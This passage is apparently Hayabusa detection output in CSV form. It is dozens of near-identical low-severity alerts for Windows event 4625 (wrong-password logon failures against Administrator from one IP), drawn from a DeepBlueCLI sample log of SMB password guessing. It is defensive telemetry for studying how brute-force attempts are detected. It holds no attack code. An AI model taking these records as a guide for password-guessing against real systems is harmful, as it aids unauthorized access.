NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fAxfxSbRqGO7Dej0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D7XmvDYk6zFLir09 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mWcl6CKdSMxd8edZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SxBQlFZvGBqDdobn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AXN94VanwME6q8rc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:28.467 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JOj7CZ3stJXePY8b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXjmqxguFGL3f8cV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qHWmdxnRrMbxrdlN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6ROBnjuyHn4FRugk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.754 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zGxuUxasL680O21l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CYoM984EzAkUtBoa : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0e3ATNpzeeAf6Qax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1A0dGhpVy8kgiRP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xGgNAKJM5RAt9B5K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c3DpedXujvQpZnjQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BsaSjESaUHbsIxJL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:29.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ca4dlxyEco3VOapw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Z6lJc7DXAOcNZ2G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Olt5mS7na07VDJE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oCFeQcUMDTs0ev8v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.233 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FYmH6CQrizoZ1DAx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iYtujXkzySwZQFk8 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KE9v6wzrebvjvDIl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.365 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 81gmRFFBHI1s4dqi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C8gHWPDjQM8M3tiQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: szj4mJvtFV06CuR2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ceGEl87hOM0InAAd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:29.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XRv3C3rRxYXTgckj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.581 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TaPkJPIQnbL3VyUC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LZ7PZAT6hWWHNc29 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AJVD4uVhwfLSJ6Ab : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q6KME1I6tE0v9UAq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Qtt1rk4n3tOJko2 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: prPsA8EZHGfGPSHm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TQqGXnwHtB87LSzT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.870 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6uLT1bjaIS0XBsWC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PIgpraQTxFrcLphN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1D6qy57XImq4prx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:29.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Kw44Ffh4DIPlyuM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oKUdmKU74RmJysAx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gZUTzZw0T1tYRSP5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nEOfjuAMa7HTsfcP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e7bG19emMTmyBQNm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YsLkgWukfqS3wWJK : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: liFcZjjpY3xXwe9j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vBUgbfzx2OEcOxWL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iVCV0WoZmLTFNH71 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.516 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZJmxGOqck4oQi1kL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w7lYqaUvEtTp18DK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:30.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yZ9xQmGn61JJDeQS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XuMXpvY9fmLm0eBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ofesuNErTLWuN0k4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KsNq7SThd3b8oTwF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmRWg5gNRcxDMFjg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JXrGn6LehVwTGNNj : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vIq9DS71jCjWbgdY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kw2BQbdUml0EPNOs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ugOqsKQFGmmLac3s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3rZHUbOUVBYiHarB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: otv8ByrbWWoTz7pi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:31.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HVlHkJu4Gxc9dhxM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xKF5OCqLVVKvung0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.162 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: avAdpkOlP0xji1vG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.214 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VFgzMjEz6M0LBnX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kdJb0obVAqkY9GCw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6ciSoQcLUgLfzaNg : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RECrGCCTJuDPlvYJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Z2w67uyC2NOgecT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.425 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lRVetRdHvz0lJkOC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yXrtxquzyzxKnQgD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.526 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pWOoEIEem7Q9Mdx0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:31.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 86n5nIm04810NptD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M08noHtTqqx3pxSe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.651 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3P983pRVfCVlVTyA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.699 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eMKlcLvRhlx9FMcZ : IP Address: 192.168.198.149 : AuthPackage: 